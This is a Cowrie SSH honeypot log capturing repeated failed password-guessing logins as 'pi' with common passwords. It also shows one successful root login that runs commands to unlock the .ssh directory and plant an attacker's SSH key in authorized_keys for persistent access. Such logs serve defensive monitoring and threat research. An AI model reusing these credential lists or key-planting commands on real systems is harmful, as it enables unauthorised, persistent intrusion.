{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36588,"dst_ip":"1.2.3.4","dst_port":22,"session":"85694da27f39","protocol":"ssh","message":"New connection: 196.251.115.108:36588 (1.2.3.4:22) [session: 85694da27f39]","sensor":"my-vps","timestamp":"2025-08-24T23:16:30.212224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:16:30.527318Z","src_ip":"196.251.115.108","session":"85694da27f39"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:16:30.538570Z","src_ip":"196.251.115.108","session":"85694da27f39"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456789","message":"login attempt [pi/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:16:33.315414Z","src_ip":"196.251.115.108","session":"85694da27f39"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:16:34.425843Z","src_ip":"196.251.115.108","session":"85694da27f39"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":41648,"dst_ip":"1.2.3.4","dst_port":22,"session":"36ece676416c","protocol":"ssh","message":"New connection: 196.251.115.108:41648 (1.2.3.4:22) [session: 36ece676416c]","sensor":"my-vps","timestamp":"2025-08-24T23:17:17.814265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:17:18.392524Z","src_ip":"196.251.115.108","session":"36ece676416c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:17:18.405381Z","src_ip":"196.251.115.108","session":"36ece676416c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345","message":"login attempt [pi/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:17:21.525278Z","src_ip":"196.251.115.108","session":"36ece676416c"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:17:22.755717Z","src_ip":"196.251.115.108","session":"36ece676416c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":47324,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c72514615aa","protocol":"ssh","message":"New connection: 196.251.115.108:47324 (1.2.3.4:22) [session: 5c72514615aa]","sensor":"my-vps","timestamp":"2025-08-24T23:18:05.252811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:18:05.552400Z","src_ip":"196.251.115.108","session":"5c72514615aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:18:05.553152Z","src_ip":"196.251.115.108","session":"5c72514615aa"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:18:08.867441Z","src_ip":"196.251.115.108","session":"5c72514615aa"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:18:10.225818Z","src_ip":"196.251.115.108","session":"5c72514615aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:18:26.090311Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.session.closed","duration":180.11235404014587,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:18:26.094489Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":51742,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d060e94904b","protocol":"ssh","message":"New connection: 196.251.115.108:51742 (1.2.3.4:22) [session: 6d060e94904b]","sensor":"my-vps","timestamp":"2025-08-24T23:18:52.307602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:18:52.770619Z","src_ip":"196.251.115.108","session":"6d060e94904b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:18:52.779081Z","src_ip":"196.251.115.108","session":"6d060e94904b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"qwerty","message":"login attempt [pi/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:18:54.853020Z","src_ip":"196.251.115.108","session":"6d060e94904b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:18:55.870890Z","src_ip":"196.251.115.108","session":"6d060e94904b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:19:18.956249Z","src_ip":"79.124.8.120","session":"5c2737d3eead"}
{"eventid":"cowrie.session.closed","duration":180.09945917129517,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:19:18.960393Z","src_ip":"79.124.8.120","session":"5c2737d3eead"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":35046,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f00d73c7d5","protocol":"ssh","message":"New connection: 196.251.115.108:35046 (1.2.3.4:22) [session: 36f00d73c7d5]","sensor":"my-vps","timestamp":"2025-08-24T23:19:39.010721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:19:39.392164Z","src_ip":"196.251.115.108","session":"36f00d73c7d5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:19:39.392857Z","src_ip":"196.251.115.108","session":"36f00d73c7d5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123123","message":"login attempt [pi/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:19:42.721015Z","src_ip":"196.251.115.108","session":"36f00d73c7d5"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:19:44.125052Z","src_ip":"196.251.115.108","session":"36f00d73c7d5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42476,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad13f52d4939","protocol":"ssh","message":"New connection: 196.251.115.108:42476 (1.2.3.4:22) [session: ad13f52d4939]","sensor":"my-vps","timestamp":"2025-08-24T23:20:25.677307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:20:26.054260Z","src_ip":"196.251.115.108","session":"ad13f52d4939"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:20:26.055117Z","src_ip":"196.251.115.108","session":"ad13f52d4939"}
{"eventid":"cowrie.login.failed","username":"pi","password":"111111","message":"login attempt [pi/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:20:28.236112Z","src_ip":"196.251.115.108","session":"ad13f52d4939"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:20:29.336545Z","src_ip":"196.251.115.108","session":"ad13f52d4939"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52216,"dst_ip":"1.2.3.4","dst_port":22,"session":"51ba8127a6d9","protocol":"ssh","message":"New connection: 196.251.115.108:52216 (1.2.3.4:22) [session: 51ba8127a6d9]","sensor":"my-vps","timestamp":"2025-08-24T23:21:12.322115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:21:12.824953Z","src_ip":"196.251.115.108","session":"51ba8127a6d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:21:12.825640Z","src_ip":"196.251.115.108","session":"51ba8127a6d9"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:21:15.886492Z","src_ip":"196.251.115.108","session":"51ba8127a6d9"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:21:17.198481Z","src_ip":"196.251.115.108","session":"51ba8127a6d9"}
{"eventid":"cowrie.session.connect","src_ip":"58.144.199.22","src_port":33566,"dst_ip":"1.2.3.4","dst_port":22,"session":"b319c1e800c2","protocol":"ssh","message":"New connection: 58.144.199.22:33566 (1.2.3.4:22) [session: b319c1e800c2]","sensor":"my-vps","timestamp":"2025-08-24T23:21:37.455196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:21:37.456192Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:21:37.629464Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.login.success","username":"root","password":"sc@123","message":"login attempt [root/sc@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:21:38.364403Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:21:38.729102Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:21:38.729936Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:21:38.731285Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:21:38.906299Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:21:39.342653Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.343434Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.518975Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:21:39.519913Z","src_ip":"58.144.199.22","session":"b319c1e800c2"}
